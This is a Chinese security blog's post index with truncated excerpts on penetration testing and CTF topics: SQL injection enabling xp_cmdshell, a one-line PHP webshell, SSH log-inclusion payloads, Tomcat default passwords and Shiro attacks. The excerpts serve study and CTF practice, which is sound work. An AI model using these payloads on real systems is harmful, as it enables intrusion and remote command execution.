随笔分类 -  精选

会被选入至www.RedTeam.wang
摘要:xp_cmdshell 开启 id=1 ' EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE; --+ 命令执行 id=1 ' exec 阅读全文
posted @ 2023-01-08 20:01 mi2ac1e 阅读(266) 评论(0) 推荐(0) 编辑
摘要:先说结论,俩集成环境我都试了试,phpstudy在MAC上跟开玩笑一样,我实在不好说。于是决定自己安装个,毕竟还有神器brew 利用brew安装PHP 7.2 首先,PHP7.2 不受支持,已经被移除了。想要安装需要: brew install shivammathur/php/php@7.2 其次 阅读全文
posted @ 2022-12-24 01:05 mi2ac1e 阅读(459) 评论(0) 推荐(0) 编辑
摘要:日志包含Getshell 题目来自CTFSHOW WEB81 简介 如果网站存在文件包含漏洞,我们可以尝试包含中间件等的日志来帮助我们getshell 日志位置 既然要包含日志,那么就必须知道一些默认的日志存放路径 | 系统 | 服务器 | 可能的错误日志的位置 | | | | | | window 阅读全文
posted @ 2022-10-29 18:40 mi2ac1e 阅读(282) 评论(0) 推荐(0) 编辑
摘要:shiro不出网的打法 Author:Mi2ac1e 0x01 环境搭建 安装NGINX apt update apt install nginx 修改配置文件: 如果你找不到自己的nginx配置文件,需要使用 /usr/sbin/nginx -t 进入对应文件夹修改: cd /etc/nginx/ 阅读全文
posted @ 2022-10-29 00:04 mi2ac1e 阅读(2331) 评论(0) 推荐(0) 编辑
摘要:从一次应急溯源学习如何攻陷WordPress 九月的某日,安静的群里学长突然惊呼,自己管理的某个WordPress站被攻陷了,需要帮忙协助应急溯源,于是有了本文。本文从流量侧入手,先分析了网站是如何打进来的,再从代码层入手,分析了再被攻陷后的时间内,网站都遭到了什么样的不法侵害。同时,本次的代码分析 阅读全文
posted @ 2022-10-27 00:06 mi2ac1e 阅读(714) 评论(0) 推荐(0) 编辑
摘要:我的BloodHound在大概2021年就安装了,之后没用过几回。最近由于一些内网渗透学习的原因,又重回BloodHound的怀抱。但很显然,他并不友好。我在信息收集结束后,尝试导入数据,却发生了错误,表现为 数据一直卡在0%不动,并且某个数据出现了NaN%的问题。 后续经过一系列查询,最终找到了一 阅读全文
posted @ 2022-10-20 22:46 mi2ac1e 阅读(830) 评论(0) 推荐(0) 编辑
摘要:Tomcat弱口令这个问题,仍然需要多提一提,因为确实需要关注的东西有点多。 版本 tomcat <=6.0版本,默认密码为admin 空 tomcat >=6.0版本,无默认用户,只能说是高频密码,诸如tomcat tomcat 或者是tomcat 403的时候告诉你的tomcat s3cret 阅读全文
posted @ 2022-09-19 15:07 mi2ac1e 阅读(830) 评论(0) 推荐(0) 编辑
摘要:这个漏洞当初在打CTF的实网攻防的时候遇到了,很开心的直接RCE了。但是当初的我们实在是太过青涩,不懂得JAVA命令执行的奥妙,导致没法Getshell进入内网拿到更多的flag。今天就旧事重提,谈谈这个漏洞如何Getshell或者正确的RCE Java Runtime.getRuntime().e 阅读全文
posted @ 2022-09-18 23:07 mi2ac1e 阅读(291) 评论(0) 推荐(0) 编辑
摘要:众所周知,Xray在检测一些漏洞的时候需要配置反连平台,例如像Fastjson strust2 Log4j等等,这些漏洞都是非常高危的漏洞,对我们来说,也是非常值得关注的。 然而,您必须配置Xray才可以正常检测。 本篇文章仅配置http,没配置dns的 首先配置反连平台的配置文件,修改文件夹下的c 阅读全文
posted @ 2022-08-24 12:07 mi2ac1e 阅读(3056) 评论(0) 推荐(0) 编辑
摘要:一直以来,切换java版本一直是令我头疼的问题,一开始我的解决办法太蠢了,将所有需要高版本java的软件装在一台虚拟机中,所有低版本java的软件装在一台虚拟机中。但显然,这样并不是非常的方便。直到最近才知道可以利用jenv来切换版本。官方只有Mac或者Linux的,但是太穷了,买不起MAC,只能找 阅读全文
posted @ 2022-03-25 17:19 mi2ac1e 阅读(3331) 评论(3) 推荐(2) 编辑
摘要:最近在做某个测试的时候已经可以RCE,但是payload长度受限制即echo不了整个的冰蝎webshell。 这个时候首先想到的是追加,把完整的一句话写入,这在前面是可行的: 但是后面我发现,单是一句话就超过了字数限制。也就是说,现在的任务是: 把很长的一句话追加写入,且不能换行 于是继续百度,尝试 阅读全文
posted @ 2022-02-14 19:37 mi2ac1e 阅读(848) 评论(0) 推荐(0) 编辑
摘要:<?=`$_GET[1]`?> 注意:在反引号里面,你应该注意括号中间是不能加引号的,比如['a']这种是不被允许的。 特点: 无php字样 非常短 利用echo+反引号执行命令的特征实现回显。 阅读全文
posted @ 2022-02-04 11:41 mi2ac1e 阅读(142) 评论(0) 推荐(0) 编辑
摘要:在做暴力破解的过程中,可能会遇到定长的问题。如果你单纯使用Burp的Number-Form 0001-9999 那实际上爆破的效果是从1-9999 很显然这不是我们想要的结果(如下图) 我们可以使用下方的这个设置来帮助我们定长爆破: 这样就可以真正的从0001-9999了。 阅读全文
posted @ 2022-01-09 18:25 mi2ac1e 阅读(2830) 评论(0) 推荐(1) 编辑
摘要:对FFUF的一些常用命令做一下笔记,原文 0x00 Download https://github.com/ffuf/ffuf 0x01 基础参数 -u 指定URL 添加FUZZ字样,则代表FUZZ这个位置 -w 设置字典 多字典: ./ffuf -u www.abc.com/FUZZ1/FUZZ2 阅读全文
posted @ 2022-01-04 19:41 mi2ac1e 阅读(1209) 评论(0) 推荐(1) 编辑
摘要:0x01 包含登录日志 一般我们都直接放在UA中,然后开始找中间件的日志,有时候可能会有找不到的情况。此时,如果对方服务器开启SSH服务的话,我们可以使用包含SSH日志的方式 如下操作: SSH连接: ssh '<?php eval($_POST['a'];?>'@192.168.72.152 对方 阅读全文
posted @ 2022-01-03 16:35 mi2ac1e 阅读(119) 评论(0) 推荐(0) 编辑
摘要:每月更新 1/1 嘻嘻 前置知识 代码执行(Remote Code Excution) 应用程序中提供了一些可以将字符串作为代码执行的函数,如PHP中的eval()函数,可以将函数中的参数当做PHP代码执行。如果这些函数的参数控制不严格,可能会被利用,造成任意代码执行。 命令执行(Remote Co 阅读全文
posted @ 2021-11-06 00:45 mi2ac1e 阅读(2494) 评论(0) 推荐(0) 编辑
摘要:堆叠注入 题目:BUUCTF[强网杯 2019]随便注 0x01 原理 将多个语句一起进行查询,比如 select * from users;show databases; 产生这种注入的原理也很简单,是由于PHP mysql_multi_query()这个函数支持多个SQL语句同时执行,只需要使用 阅读全文
posted @ 2021-08-19 11:43 mi2ac1e 阅读(778) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示
主题色彩